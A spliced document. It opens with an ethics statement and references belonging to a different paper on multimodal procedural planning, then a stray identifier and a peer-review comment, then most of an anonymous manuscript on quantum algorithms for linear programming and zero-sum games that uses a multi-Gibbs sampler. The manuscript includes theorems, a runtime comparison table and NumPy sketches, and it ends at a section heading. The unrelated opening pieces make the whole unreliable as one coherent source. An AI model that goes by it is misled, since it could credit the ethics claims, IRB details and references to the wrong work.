We acknowledge that our research utilizes knowledge from large-scale pre-trained models, which have the potential to be biased toward certain cultural backgrounds. For example, tasks from RECIPEPLAN and WIKIPLAN that involve food preparation may have different procedures depending on individuals' eating habits. We encourage future studies that uncover multimodal procedural planning ability with consideration of personalized decision making. The data annotation part of the project is classified as exempt by the Human Subject Committee via IRB protocols. The hourly wage paid to participants is estimated at $12, which is higher than the federal minimum wage. We manually ensure no personal information is collected and no offensive content is presented during human evaluations.

REFERENCES

Jean-Baptiste Alayrac, Jeff Donahue, Pauline Luc, Antoine Miech, Iain Barr, Yana Hasson, Karel Lenc, Arthur Mensch, Katie Millican, Malcolm Reynolds, et al. Flamingo: a visual language model for few-shot learning. *arXiv preprint arXiv:2204.14198*, 2022.

Peter Anderson, Qi Wu, Damien Teney, Jake Bruce, Mark Johnson, Niko Sünderhauf, Ian Reid, Stephen Gould, and Anton Van Den Hengel. Vision-and-language navigation: Interpreting visually-grounded navigation instructions in real environments. In *Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition*, pp. 3674–3683, 2018.

Satanjeev Banerjee and Alon Lavie. METEOR: An automatic metric for MT evaluation with improved correlation with human judgments. In *IEEvaluation@ACL*, 2005.

Anthony Brohan, Yevgen Chebotar, Chelsea Finn, Karol Hausman, Alexander Herzog, Daniel Ho, Julian Ibarz, Alex Irpan, Eric Jang, Ryan Julian, et al. Do as I can, not as I say: Grounding language in robotic affordances. In *6th Annual Conference on Robot Learning*, 2022.

Tim Brooks, Aleksander Holynski, and Alexei A Efros. InstructPix2Pix: Learning to follow image editing instructions. *arXiv preprint arXiv:2211.09800*, 2022.

Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, et al. Language models are few-shot learners. *Advances in Neural Information Processing Systems (NeurIPS)*, 33:1877–1901, 2020.

Rémi Calizzano, Malte Ostendorff, and Georg Rehm. Ordering sentences and paragraphs with pre-trained encoder-decoder transformers and pointer ensembles. In *Proceedings of the 21st ACM Symposium on Document Engineering*, pp. 1–9, 2021.

Tuhin Chakrabarty, Arkady Saakyan, Olivia Winn, Artemis Panagopoulou, Yue Yang, Marianna Apidianaki, and Smaranda Muresan. I spy a metaphor: Large language models and diffusion models co-create visual metaphors. *OpenReview preprint*, 2022. Under review.

Chien-Yi Chang, De-An Huang, Danfei Xu, Ehsan Adeli, Li Fei-Fei, and Juan Carlos Niebles. Procedure planning in instructional videos.
In *European Conference on Computer Vision*, pp. 334–350. Springer, 2020. Xinchi Chen, Xipeng Qiu, and Xuanjing Huang. Neural sentence ordering. *arXiv preprint arXiv:1607.06952*, 2016. Jaemin Cho, Jie Lei, Hao Tan, and Mohit Bansal. Unifying vision-and-language tasks via text generation. In *International Conference on Machine Learning*, pp. 1931–1942. PMLR, 2021. Baiyun Cui, Yingming Li, Ming Chen, and Zhongfei Zhang. Deep attentive sentence ordering network. In *Proceedings of the 2018 Conference on Empirical Methods in Natural Language Processing*, pp. 4340–4349, 2018.
rUx0zQFwD1
Thm. 2.3: it would be better to explain the difference between the consistent version and the usual version of amplitude estimation before stating the theorem. $f$ is not defined. Is it some fixed function? So, when $p$ and $s$ are fixed, with high probability, the algorithm's output will be the same?
Quantum Speedups in Linear Programming via Sublinear Multi-Gibbs Sampling

Anonymous authors
Paper under double-blind review

Abstract

As a basic optimization technique, linear programming has found wide applications in many areas. In this paper, we propose an improved quantum algorithm for solving a linear programming problem with $m$ constraints and $n$ variables in time $\tilde{O}(\sqrt{m + n}\gamma^{2.25})$, where $\gamma = Rr/\varepsilon$ is the additive error scaled by the bounds $R$ and $r$ on the size of the primal and dual optimal solutions, improving the prior best $\tilde{O}(\sqrt{m + n}\gamma^{2.5})$ by Bouland, Getachew, Jin, Sidford, and Tian (2023) and Gao, Ji, Li, and Wang (2023). Our algorithm solves linear programming via a zero-sum game formulation, under the framework of sample-based optimistic multiplicative weight update. At the heart of our construction is an improved quantum multi-Gibbs sampler for diagonal Hamiltonians with time complexity sublinear in the inverse temperature $\beta$, breaking the general $O(\beta)$ barrier.

1 Introduction

Linear programming is a powerful mathematical optimization technique used to achieve the best outcome given a set of requirements represented as linear relationships. It involves maximizing a linear objective function subject to linear equality or inequality constraints, where the variables can take real values. It enables optimal and efficient decision-making in many complex real-world problems, including resource allocation, portfolio optimization, and network flows. It is also fundamental to combinatorial optimization. To be more concrete, a linear programming (LP) problem can be formulated in the following standard form: given a matrix $A \in \mathbb{R}^{m \times n}$, a vector $c \in \mathbb{R}^n$, and a vector $b \in \mathbb{R}^m$, decide the maximum value of $c^\top x$ over variable vectors $x$ subject to the constraints $Ax = b$ and $x \geq 0$. In the study of general LP algorithms, one usually assumes $m = \Theta(n)$ for simplicity. Also, there are cases where the algorithm can only output an approximate optimal value with additive error $\varepsilon$.

In 1947, the simplex method was proposed by George Dantzig to solve the linear programming problem. The simplex algorithm is very efficient in practice. However, in 1972, it was shown that the worst-case time complexity of the simplex algorithm is exponential (with respect to $n$) (Klee & Minty, 1972). The linear programming problem was proven to be solvable in polynomial time by Leonid Khachiyan in 1979 (Khachiyan, 1980). In recent years, several works (Cohen et al., 2021; Jiang et al., 2021) have aimed to give faster algorithms for the linear programming problem. Cohen et al. (2021) gave an algorithm for LP in $O^*(n^\omega)$ time,\footnote{Throughout this paper, $\omega \approx 2.37$ denotes the matrix multiplication exponent.} for the current value $\omega \approx 2.37$, and in $O^*(n^{2+1/6})$ time if $\omega = 2$. Jiang et al. (2021) improved the latter complexity to $O^*(n^{2+1/18})$ if $\omega = 2$.

Linear programming has deep connections to matrix games in game theory. A matrix game involves two players who each choose from a finite set of pure strategies. The payoffs for each player are given in a payoff matrix based on the pure strategies chosen. Matrix games can be expressed as linear programs, with the payoff matrix providing the coefficients for the objective function and constraints.
The linear programming formulation allows for identifying the optimal mixed strategies that maximize the expected payoff for each player. Solving the corresponding dual linear program yields the value of the game. Therefore, techniques developed for solving linear programs can also be applied to finding optimal solutions of matrix games. Conversely, algorithms for finding optimal solutions of matrix games can also be transformed into algorithms for linear programming (Vaserstein, 2006). Grigoriadis & Khachiyan (1995) gave an $\tilde{O}((n + m)/\varepsilon^2)$-time randomized algorithm for matrix games. This is done by updating a single entry of the strategy vectors at a time. Using the variance reduction technique, Carmon et al. (2019) gave an $\tilde{O}(mn + \sqrt{mn(m + n)}/\varepsilon)$-time algorithm for matrix games.

Quantum computation utilizes the principles of quantum mechanics to perform computation in a different way from classical computation. Rather than using classical binary bits (which have only two states, 0 and 1), quantum computers use quantum bits (qubits) to store data and perform computation. The state of qubits can be in a superposition of the 0 and 1 states. Harnessing this superposition feature, quantum algorithms are able to achieve speedups over their classical counterparts. For instance, Shor's algorithm for integer factorization and Grover's algorithm for database search provide provable speedups over the best-known classical algorithms. Over the years, many quantum algorithms have been developed with quantum speedups over their classical counterparts. In the area of optimization, quantum algorithms for semi-definite programming form one of the most important research directions in quantum algorithms (Brandao & Svore, 2017; van Apeldoorn et al., 2017; Brandão et al., 2019; van Apeldoorn & Gilyén, 2019a). Other examples include quantum recommendation systems (Kerenidis & Prakash, 2017) and quantum algorithms for training linear and kernel-based classifiers (Li et al., 2019).

In van Apeldoorn et al. (2017), the authors pointed out that their algorithm for semi-definite programming can also be applied to solve linear programming problems in time $\tilde{O}(\sqrt{mn}(Rr/\varepsilon)^5)$, where $R$ and $r$ are parameters related to the numerical scale of the problem. Then, van Apeldoorn & Gilyén (2019b) gave a quantum algorithm specifically for matrix zero-sum games and linear programming with running time $\tilde{O}(\sqrt{m+n}(Rr/\varepsilon)^3)$, achieved by designing a quantum Gibbs sampler and using the framework proposed in Grigoriadis & Khachiyan (1995). Following this work, Bouland et al. (2023) proposed an improved dynamic Gibbs sampler, which results in an $\tilde{O}(\sqrt{m+n}/\varepsilon^{2.5})$-time solver for matrix zero-sum games.

This work presents improved quantum algorithms for matrix zero-sum games and linear programming by extending the framework of sample-based optimistic multiplicative weight update first proposed by Gao et al. (2023). The framework requires a specific task called multi-Gibbs sampling, in which the quantum subroutine collects multiple samples from the Gibbs distribution in a single update iteration. In their work, they used the "preparing many copies of a quantum state" technique of Hamoudi (2022) and the quantum singular value transformation (Gilyén et al., 2019) to give an efficient quantum multi-Gibbs sampler.
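As a concrete illustration of the game-LP correspondence discussed above, the following sketch computes the value of a small matrix game with SciPy's LP solver, using the convention of Section 4.1 below in which the x-player minimizes $x^\top A y$. This is illustrative only and not part of our algorithm.

```python
import numpy as np
from scipy.optimize import linprog

def solve_zero_sum(A):
    """Value and optimal x for min_{x in simplex} max_j (A^T x)_j."""
    m, n = A.shape
    c = np.zeros(m + 1)
    c[-1] = 1.0                                    # minimize the game value v
    A_ub = np.hstack([A.T, -np.ones((n, 1))])      # (A^T x)_j - v <= 0 for all j
    b_ub = np.zeros(n)
    A_eq = np.concatenate([np.ones(m), [0.0]])[None, :]   # sum_i x_i = 1
    res = linprog(c, A_ub=A_ub, b_ub=b_ub, A_eq=A_eq, b_eq=[1.0],
                  bounds=[(0, None)] * m + [(None, None)])
    return res.x[:m], res.x[-1]

A = np.random.default_rng(0).random((5, 7))        # payoffs in [0, 1]
x, value = solve_zero_sum(A)
print(f"game value ~ {value:.4f}, x = {np.round(x, 3)}")
```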
All the previous quantum Gibbs samplers used in van Apeldoorn & Gilyén (2019b); Bouland et al. (2023); Gao et al. (2023) have a linear dependence on the $\ell_1$-norm $\beta$ of the vector $u$. The parameter $\beta$ plays the role of inverse temperature, as it scales the diagonal Hamiltonian $H = \text{diag}(u)/\beta$ of trace norm 1. This $\beta$-dependence is known as the $\Omega(\beta)$ barrier and is proved for general quantum Gibbs sampling (Gilyén et al., 2019; Wang & Zhang, 2023). Surprisingly, our improved multi-Gibbs sampler breaks this $\Omega(\beta)$ bound in the sense of amortized complexity per sample, under certain conditions. This improvement is the key to our further speedup compared with the previous approach of Gao et al. (2023). By combining the new multi-Gibbs sampler with the sample-based optimistic multiplicative weight update framework, we present an $\tilde{O}(\sqrt{m+n}/\varepsilon^{2.25})$-time quantum solver for matrix zero-sum games and an $\tilde{O}(\sqrt{m+n}(Rr/\varepsilon)^{2.25})$-time quantum linear programming solver.

### 1.1 Our Results

We propose quantum algorithms for solving matrix zero-sum games and linear programming problems, which improve on the runtime of the prior state-of-the-art quantum algorithms (Bouland et al., 2023; Gao et al., 2023).

**Theorem 1.1** (Informal version of Corollary 4.2). There exists a quantum algorithm that, for $\varepsilon \in (0, 1/2)$ satisfying $1/\varepsilon = O((m+n)^2)$, returns an $\varepsilon$-approximate Nash equilibrium for the zero-sum game $A \in \mathbb{R}^{m \times n}$ with probability at least $2/3$ in $\tilde{O}(\sqrt{m+n}/\varepsilon^{2.25})$ time.

Notice that our theorem requires $1/\varepsilon = \tilde{O}((m+n)^2)$. If this does not hold, i.e., $1/\varepsilon = \tilde{\Omega}((m+n)^2)$, we can directly use the algorithm of Grigoriadis & Khachiyan (1995), whose $\tilde{O}((m+n)/\varepsilon^2)$ running time is then the better one. In comparison, the algorithms in Bouland et al. (2023); Gao et al. (2023), with time complexity $\tilde{O}(\sqrt{m+n}/\varepsilon^{2.5})$, require $1/\varepsilon = O(m+n)$ to beat the classical bound. Our algorithm thus allows a wider range of parameter choices and achieves further quantum speedups on this problem.

For the linear programming solver, we have:

**Theorem 1.2** (Informal version of Corollary 4.3). There exists a quantum algorithm that, for $\varepsilon \in (0, 1/2)$, returns an $\varepsilon$-feasible and $\varepsilon$-optimal solution for linear programming problems with $n$ variables and $m$ constraints with probability at least $2/3$ in $\tilde{O}(\sqrt{m+n}\gamma^{2.25})$ time, provided that $R$ and $r$ are bounds on the $\ell_1$ norms of the primal and dual optimal solutions and $\gamma = Rr/\varepsilon = \tilde{O}((m+n)^2)$.

In Table 1 we compare our algorithm with previous classical and quantum algorithms for linear programming. The essential part in proving our theorems is an improved quantum multi-Gibbs sampler for diagonal Hamiltonians, which we state below.
**Theorem 1.3 (Informal version of Theorem 3.2).** There exists a quantum algorithm such that, for every $\varepsilon \in (0, 1/2)$ and a $(\beta, \lceil \log_2(n) \rceil, O(1), O(1))$-amplitude-encoding $V$ of a vector $u \in \mathbb{R}^n_{>0}$ with $\beta \geq 1$, if the number of copies $k$ satisfies $k = \Omega(\sqrt{\beta})$ and $k = \tilde{O}(n\sqrt{\beta})$, then with probability at least $1 - \varepsilon$ the algorithm returns $k$ samples from a distribution that is $\varepsilon$-close to the Gibbs distribution of $u$ in total variation distance, in $\tilde{O}(\beta^{3/4}\sqrt{nk})$ time.

| Method | Approach | Type | Time Complexity |
|---|---|---|---|
| Multiplicative Weight | Grigoriadis & Khachiyan (1995) | Classical | $\tilde{O}((m+n)\gamma^2)$ |
| Multiplicative Weight | Syrgkanis et al. (2015) | Classical | $\tilde{O}(mn\gamma)$ |
| Multiplicative Weight | Li et al. (2019) | Quantum | $\tilde{O}(\sqrt{m+n}\gamma^4)$ |
| Multiplicative Weight | van Apeldoorn & Gilyén (2019b) | Quantum | $\tilde{O}(\sqrt{m+n}\gamma^3)$ |
| Multiplicative Weight | Bouland et al. (2023) | Quantum | $\tilde{O}(\sqrt{m+n}\gamma^{2.5})$ |
| Multiplicative Weight | Gao et al. (2023) | Quantum | $\tilde{O}(\sqrt{m+n}\gamma^{2.5})$ |
| Multiplicative Weight | Our result | Quantum | $\tilde{O}(\sqrt{m+n}\gamma^{2.25})$ |
| Interior Point | Jiang et al. (2021) | Classical | $O^*((m+n)^\omega)$ |
| Interior Point | Casares & Martin-Delgado (2020) | Quantum | $\tilde{O}(\sqrt{n}(m+n)M\kappa/\varepsilon^2)$ † |

† $M$ and $\kappa$ are the Frobenius norm and condition number of the systems of linear equations in the algorithm.

### 1.2 Main Techniques

Quantum Gibbs sampling has been used in solving SDP and LP problems (Brandão & Svore, 2017; van Apeldoorn et al., 2017; Brandão et al., 2019; van Apeldoorn & Gilyén, 2019a,b; Bouland et al., 2023). Recently, a Gibbs sampler specifically designed for diagonal Hamiltonians was proposed in van Apeldoorn & Gilyén (2019b) for solving zero-sum games and LPs. Their quantum Gibbs sampler adopts the idea of quantum rejection sampling (Grover, 2000; Ozols et al., 2013). The sampler first prepares a uniform superposition state $|\Psi\rangle$, and then applies a unitary block-encoding of $\exp(\beta H)$ to the state, where $H$ is the diagonal Hamiltonian $\text{diag}(u - u_{\max})/\beta$ with $u = Ax$ and $\beta \geq \|u\|_1$, resulting in a state
$$|\psi\rangle \approx \frac{1}{\sqrt{n}}|0\rangle|u_{\text{Gibbs}}\rangle + |1\rangle|\text{garbage}\rangle,$$
where measuring $|u_{\text{Gibbs}}\rangle$ in the computational basis returns a classical sample from the desired Gibbs distribution. The unitary block-encoding is constructed by quantum singular value transformation (QSVT) with a polynomial approximating $\exp(\beta x)$ of degree $\tilde{O}(\beta)$.
In Gao et al. (2023), they improved the procedure of van Apeldoorn & Gilyén (2019b) by (i) preparing a non-uniform initial state $|\Psi'\rangle$ after an $\tilde{O}(\beta\sqrt{nk})$-time pre-processing procedure, adapting the "preparing many copies of a quantum state" technique of Hamoudi (2022), and (ii) applying a unitary block-encoding of $\exp(\beta H')$, where $H'$ is determined by the pre-processing procedure, which results in a state
$$|\psi'\rangle \approx \sqrt{\frac{k}{n}}|0\rangle|u_{\text{Gibbs}}\rangle + |1\rangle|\text{garbage}\rangle.$$
Then, they can obtain a copy of $|u_{\text{Gibbs}}\rangle$ in $\tilde{O}(\beta\sqrt{n/k})$ time, and thereby $k$ copies in $\tilde{O}(\beta\sqrt{nk})$ time. In this paper, we further improve the multi-sampling of Gao et al. (2023) with two novel observations.

**Better polynomial approximation.** Previous works (van Apeldoorn & Gilyén, 2019b; Bouland et al., 2023; Gao et al., 2023) used a polynomial of degree $\tilde{O}(\beta)$ to approximate the function $\exp(\beta x)$. We observe that the polynomial is only required to be well-behaved on the interval $[-1, 0]$. Thus, a polynomial approximation of $\exp(-\beta - \beta x)$ suffices, and a suitable polynomial of degree $\tilde{O}(\sqrt{\beta})$ is known from Sachdeva & Vishnoi (2014); a numerical check appears at the end of this subsection. Using this polynomial, we can reduce the time complexity of step (ii) of the algorithm of Gao et al. (2023) to $\tilde{O}(\sqrt{\beta nk})$ for preparing $k$ copies of $|u_{\text{Gibbs}}\rangle$.

**Tradeoff between pre-processing and multi-sampling.** Even though we reduce the time complexity of step (ii) of the algorithm of Gao et al. (2023), the overall time complexity remains unchanged due to the dominating cost of the pre-processing procedure. We therefore parameterize the pre-processing and multi-sampling procedures with time complexities $\tilde{O}(\beta \sqrt{n\xi})$ and $\tilde{O}(k\sqrt{\beta n/\xi})$, respectively. As a result, the time complexity is reduced to
$$\tilde{O}(\beta \sqrt{n\xi}) + \tilde{O}(k\sqrt{\beta n/\xi}) = \tilde{O}(\beta^{3/4}\sqrt{nk})$$
by setting $\xi = \Theta(k/\sqrt{\beta})$.

2 Preliminaries

2.1 Notations

Throughout this paper, we fix the following notations: $[n]$ stands for the set $\{1, \ldots, n\}$. The symbol $\mathbb{R}_{\geq 0}^n$ stands for the set of $n$-dimensional vectors with non-negative entries. The symbol $\Delta_n$ stands for the probability simplex $\{x \in \mathbb{R}_{\geq 0}^n : \sum_{i=1}^n x_i = 1\}$. For a vector $u \in \mathbb{R}^n$, the notation $\text{diag}(u)$ stands for the diagonal matrix in $\mathbb{R}^{n \times n}$ whose diagonal entries are the entries of $u$.

2.2 Quantum Computation

Input Model. For matrix zero-sum games and linear programming, the input is a matrix $A = (A_{i,j})_{i \in [m], j \in [n]} \in \mathbb{R}^{m \times n}$. However, the running time would be $\Omega(mn)$ if all the entries of $A$ were read classically. Thus, the classical literature (Grigoriadis & Khachiyan, 1995) assumes oracle access $f_A(\cdot,\cdot)$ to $A$, where the oracle function $f_A$ acts as follows:
$$f_A(i,j) = A_{i,j}.$$
Following this idea, previous quantum algorithms for zero-sum games (van Apeldoorn & Gilyén, 2019b; Bouland et al., 2023; Gao et al., 2023) used a quantum analogue of this oracle, namely a unitary $O_A$ that acts as follows:
$$O_A|i\rangle|j\rangle|k\rangle = |i\rangle|j\rangle|k \oplus A_{i,j}\rangle.$$
Here, we assume that $A_{i,j}$ has finite floating-point precision.
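Returning to the first observation above, the following NumPy sketch numerically instantiates the degree-$\tilde{O}(\sqrt{\beta})$ approximation of $\exp(-\beta - \beta x)$ using the constructions stated later as Theorems 2.7 and 2.8; the concrete constants in $t$ and $d$ are our choices for the demonstration.

```python
import numpy as np
from math import lgamma, log, exp, sqrt, ceil
from numpy.polynomial import chebyshev as cheb

def p_coeffs(s, d):
    """Chebyshev coefficients of p_{s,d}(x) ~ x^s (Theorem 2.7)."""
    c = np.zeros(d + 1)
    for i in range(-min(s, d), min(s, d) + 1):
        if (s + i) % 2 == 0:
            k = (s + i) // 2
            # binom(s, k) / 2^s, computed in logs to avoid huge integers
            c[abs(i)] += exp(lgamma(s + 1) - lgamma(k + 1)
                             - lgamma(s - k + 1) - s * log(2.0))
    return c

def q_coeffs(lam, t, d):
    """Chebyshev coefficients of q_{lam,t,d}(x) ~ exp(-lam - lam*x) (Theorem 2.8)."""
    c = np.zeros(d + 1)
    term = exp(-lam)                       # exp(-lam) * (-lam)^i / i!
    for i in range(t + 1):
        c += term * p_coeffs(i, d)
        term *= -lam / (i + 1)
    return c

beta, delta = 400.0, 1e-3
t = ceil(2 * (beta + log(1 / delta)))      # Taylor truncation order
d = ceil(3 * sqrt(t * log(1 / delta)))     # degree ~ sqrt(beta), not beta
x = np.linspace(-1.0, 1.0, 2001)
err = np.abs(cheb.chebval(x, q_coeffs(beta, t, d)) - np.exp(-beta - beta * x))
print(f"degree d = {d} (vs. beta = {beta:g}); sup error on [-1,1] = {err.max():.1e}")
```

With these parameters the sup error is far below $\delta$ while the degree $d$ is roughly $\beta^{1/2}$ up to logarithmic factors, which is exactly the saving exploited in step (ii).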
We also assume oracle access to the unitary $O'_A$ that satisfies:
$$O'_A|i\rangle|j\rangle|0\rangle = |i\rangle|j\rangle \otimes \left(\sqrt{A_{i,j}}|0\rangle + \sqrt{1-A_{i,j}}|1\rangle\right).$$

QRAM. Quantum-read classical-write random access memory (QRAM) is a common assumption in many quantum algorithms. The memory stores classical data and allows superposition query access. Previous quantum algorithms for linear programming problems (van Apeldoorn & Gilyén, 2019b; Bouland et al., 2023; Gao et al., 2023) all utilize QRAM to achieve quantum read access for efficiently constructing unitaries.

Complexity Measure. For the query complexity of quantum algorithms, when we say that we use queries to $U$, we mean queries to $U$, controlled-$U$, and their inverses. For the time complexity, following Apers & de Wolf (2022), we say a quantum algorithm has time complexity $T$ if it uses at most $T$ one- and two-qubit gates, quantum queries to the input, and QRAM operations.

2.3 Basic Quantum Algorithms

Quantum Minima Finding. Finding the minimal $k$ elements in a database with $n$ entries is a common task. It is known from Dürr et al. (2006) that quantum algorithms have quadratic speedups not only in $n$ but also in $k$. Here, we state a modified version of their theorem for our use, which finds maximal elements instead of minimal ones.

Theorem 2.1 (Quantum maxima finding, adapted from Dürr et al. (2006), Theorem 3.4). Given $k \in [n]$ and a quantum oracle $O_a$ for an array $a_1, a_2, \ldots, a_n$, i.e., $O_a : |i\rangle|0\rangle \mapsto |i\rangle|a_i\rangle$ for all $i \in [n]$, there is a quantum algorithm $\text{FindMax}(O_a, n, k, \varepsilon)$ that, with probability at least $1 - \varepsilon$, finds a set $S \subseteq [n]$ of cardinality $|S| = k$ such that $a_i \geq a_j$ for all $i \in S$ and $j \notin S$, using $O(\sqrt{nk}\log(1/\varepsilon))$ queries to $O_a$ and in $O(\sqrt{nk}\log(n)\log(1/\varepsilon))$ time.

Quantum Amplitude Amplification. The procedure of quantum amplitude amplification is a generalization of Grover search, and it is commonly used in the context of quantum-singular-value-related algorithms for amplifying a desired state. Here, we state the theorem for later use.

Theorem 2.2 (Adapted from Brassard et al. (2002), Theorem 3). Let $U$ be an $n \times n$ unitary matrix. Suppose that $U|0\rangle|0\rangle = \sqrt{p}|0\rangle|\phi_0\rangle + \sqrt{1-p}|1\rangle|\phi_1\rangle$, where $p \in (0, 1)$ and $|\phi_0\rangle$, $|\phi_1\rangle$ are normalized pure quantum states. There exists a quantum algorithm $\text{Amp}(U, \varepsilon)$ that, with probability at least $1 - \varepsilon$, outputs the state $|\phi_0\rangle$, using $O(\log(1/\varepsilon)/\sqrt{p})$ queries to $U$ and in $O(\log(n)\log(1/\varepsilon)/\sqrt{p})$ time.

Consistent Quantum Amplitude Estimation. Besides quantum amplitude amplification, amplitude estimation is also a very useful quantum procedure. However, the output of the usual quantum amplitude estimation depends on the measurement outcomes, so two runs on the same input may return different estimates. In our algorithm, we need a consistent version of amplitude estimation: the estimate is (with high probability) a fixed function $f(s, p)$ of the amplitude $p$ and a random string $s$ chosen in advance, so that once $s$ and $p$ are fixed, the algorithm almost always returns the same output. It is stated as follows:

Theorem 2.3 (Adapted from Gao et al. (2023), Theorem C.3). Let $U$ be an $n \times n$ unitary matrix. Suppose that $U|0\rangle|0\rangle = \sqrt{p}|0\rangle|\phi_0\rangle + \sqrt{1-p}|1\rangle|\phi_1\rangle$, where $p \in (0, 1)$ and $|\phi_0\rangle$, $|\phi_1\rangle$ are normalized pure quantum states.
Then there exists a quantum algorithm $\text{AmpEst}(U, s, \delta)$ such that, on input $\delta > 0$ and an $O(r)$-bit random string $s$, the algorithm outputs the value $f(s, p)$, where $f$ is a fixed function satisfying $|f(s, p) - p| \leq \delta$, with probability at least $1 - \exp(-\Omega(r))$, using $O(r/\delta)$ queries to $U$ and in $O(r \log(n)/\delta)$ time.

2.4 Quantum Singular Value Transformation

Quantum singular value transformation is a powerful quantum algorithm design framework proposed in Gilyén et al. (2019). Here we review some key concepts and theorems that will be used later in our algorithm design.

Block-Encoding. The concept of block-encoding is fundamental to the quantum singular value transformation framework. The definition is as follows:

Definition 2.1. Suppose $A$ is a linear operator on a Hilbert space of $s$ qubits. For an $(s + a)$-qubit unitary operator $U$, we call it an $(\alpha, a, \varepsilon)$-block-encoding of $A$ if $U$ satisfies $\|A - \alpha(\langle 0|^{\otimes a} \otimes I)U(|0\rangle^{\otimes a} \otimes I)\| \leq \varepsilon$.

Scaling Technique for Block-Encoded Operators. Sometimes the coefficient $\alpha$ in the block-encoding is a barrier for later constructions of the overall algorithm. Thus we need the following lemma for adjusting the coefficients of block-encoded operators.

Lemma 2.4 (Up-scaling of block-encoded operators, Wang & Zhang (2023), Corollary 2.8). Suppose that a unitary operator $U$ is a $(1, a, \varepsilon)$-block-encoding of $A/\alpha$ with $\|A\| \leq 1$. Then, there is a quantum circuit $\text{BlockAmp}(U, \alpha)$ that is a $(1, a + 2, 8a\varepsilon)$-block-encoding of $A$, using $O(\alpha)$ queries to $U$ and in $O((a + 1)\alpha)$ time.

Linear Combination of Unitaries. Linear combination of unitaries (LCU) is a powerful technique that uses existing block-encodings of linear operators to obtain a block-encoding of a linear combination of these operators. To state the lemma clearly, we first need the definition of a state preparation pair.

Definition 2.2 (State preparation pair, Gilyén et al. (2019), Definition 28). Let $y \in \mathbb{R}^m$ be an $m$-dimensional vector; in this context, we require the coordinate index to start at 0, and $\|y\|_1 \leq \beta$ for some $\beta > 0$. The unitary pair $(P_L, P_R)$, both acting on $b$ qubits, is called a $(\beta, b, \varepsilon)$-state-preparation-pair for $y$ if
$$P_L|0\rangle^{\otimes b} = \sum_{j=0}^{2^b-1} c_j|j\rangle, \quad P_R|0\rangle^{\otimes b} = \sum_{j=0}^{2^b-1} d_j|j\rangle,$$
such that $\sum_{j=0}^{m-1}|y_j - \beta c_j^*d_j| \leq \varepsilon$, and $c_j^*d_j = 0$ for $j = m, \ldots, 2^b - 1$.

Now we can state the LCU lemma as follows:

Lemma 2.5 (Linear combination of block-encoded matrices, Gilyén et al. (2019), Lemma 29). Let $\{A_j\}_{j=0}^{m-1}$ be a set of linear operators of the same dimension. For all $j \in \{0, 1, \ldots, m - 1\}$, suppose we have $U_j$, which is an $(\alpha, a, \varepsilon_1)$-block-encoding of $A_j$. For an $m$-dimensional vector $y \in \mathbb{R}^m$, suppose $\beta \geq \|y\|_1$ and $(P_L, P_R)$ is a $(\beta, b, \varepsilon_2)$-state-preparation-pair for $y$. Define $A = \sum_{j=0}^{m-1} y_j A_j$ and
$$W = \sum_{j=0}^{m-1} |j\rangle\langle j| \otimes U_j + \left(I - \sum_{j=0}^{m-1} |j\rangle\langle j|\right) \otimes I_a \otimes I_s.$$
Then, we can implement a unitary $\text{LCU}((U_j)_{j=0}^{m-1}, P_L, P_R)$ that is an $(\alpha\beta, a + b, \alpha\beta\varepsilon_1 + \alpha\varepsilon_2)$-block-encoding of $A$, using $O(1)$ queries to $P_L$, $P_R$, and $W$.
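The following is a small NumPy sanity check of Lemma 2.5 in the exact case ($\alpha = 1$, $\varepsilon_1 = \varepsilon_2 = 0$), with toy Hermitian terms and $\beta = \|y\|_1$; the helper constructions are ours, chosen for simplicity rather than efficiency.

```python
import numpy as np

def block_encode(A):
    """Exact (1, 1, 0)-block-encoding of a Hermitian A with ||A|| <= 1."""
    w, Q = np.linalg.eigh(A)
    B = Q @ np.diag(np.sqrt(np.clip(1.0 - w**2, 0.0, None))) @ Q.T
    return np.block([[A, B], [B, -A]])             # unitary: A and B commute

def prep_unitary(v):
    """Householder reflection: a real unitary whose first column is v (unit)."""
    e0 = np.zeros_like(v)
    e0[0] = 1.0
    w = e0 - v
    if np.linalg.norm(w) < 1e-12:
        return np.eye(len(v))
    return np.eye(len(v)) - 2.0 * np.outer(w, w) / (w @ w)

rng = np.random.default_rng(1)
dim, m, b = 4, 3, 2                                # m = 3 terms, b = 2 ancilla qubits
As = []
for _ in range(m):
    H = rng.standard_normal((dim, dim))
    H = (H + H.T) / 2
    As.append(H / np.linalg.norm(H, 2))            # Hermitian with ||A_j|| <= 1
Us = [block_encode(A) for A in As] + [np.eye(2 * dim)]   # pad j = 3 with identity

y = np.array([0.5, 1.0, 1.5])
beta = y.sum()                                     # take beta = ||y||_1 exactly
amps = np.sqrt(np.append(y / beta, 0.0))           # c = d, with c_3 * d_3 = 0
P = prep_unitary(amps)                             # use P_L = P_R = P

W = np.zeros((2**b * 2 * dim, 2**b * 2 * dim))
for j in range(2**b):                              # W = sum_j |j><j| (x) U_j
    W[j*2*dim:(j+1)*2*dim, j*2*dim:(j+1)*2*dim] = Us[j]

V = np.kron(P.T, np.eye(2 * dim)) @ W @ np.kron(P, np.eye(2 * dim))
target = sum(yj * Aj for yj, Aj in zip(y, As)) / beta
print(np.abs(V[:dim, :dim] - target).max())        # ~1e-15: V block-encodes A/beta
```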
Polynomial Eigenvalue Transformation. We are now ready to state the polynomial eigenvalue transformation, which is a special case of quantum singular value transformation when we have a block-encoding of a Hermitian matrix. The result is obtained by combining this special case of the general QSVT theorem with the LCU lemma. The theorem is stated as follows:

**Theorem 2.6** (Gilyén et al. (2019), Theorem 31). Suppose a unitary operator $U$ is an $(\alpha, a, \varepsilon)$-block-encoding of a Hermitian matrix $A$. For every $\delta > 0$ and real polynomial $P(x) \in \mathbb{R}[x]$ of degree $d$ satisfying $\sup_{x \in [-1, 1]} |P(x)| \leq \frac{1}{2}$, there is a quantum circuit $\text{EigenTrans}(U, P, \delta)$ that is a $(1, a + 2, 4d\sqrt{\varepsilon/\alpha} + \delta)$-block-encoding of $P(A/\alpha)$. The circuit consists of $O(d)$ queries to $U$ and $O((a + 1)d)$ other one- and two-qubit gates. Moreover, the description of the quantum circuit can be computed in $O(\text{poly}(d, \log(1/\delta)))$ time on a classical computer.

### 2.5 Polynomial Approximation Results for QSVT

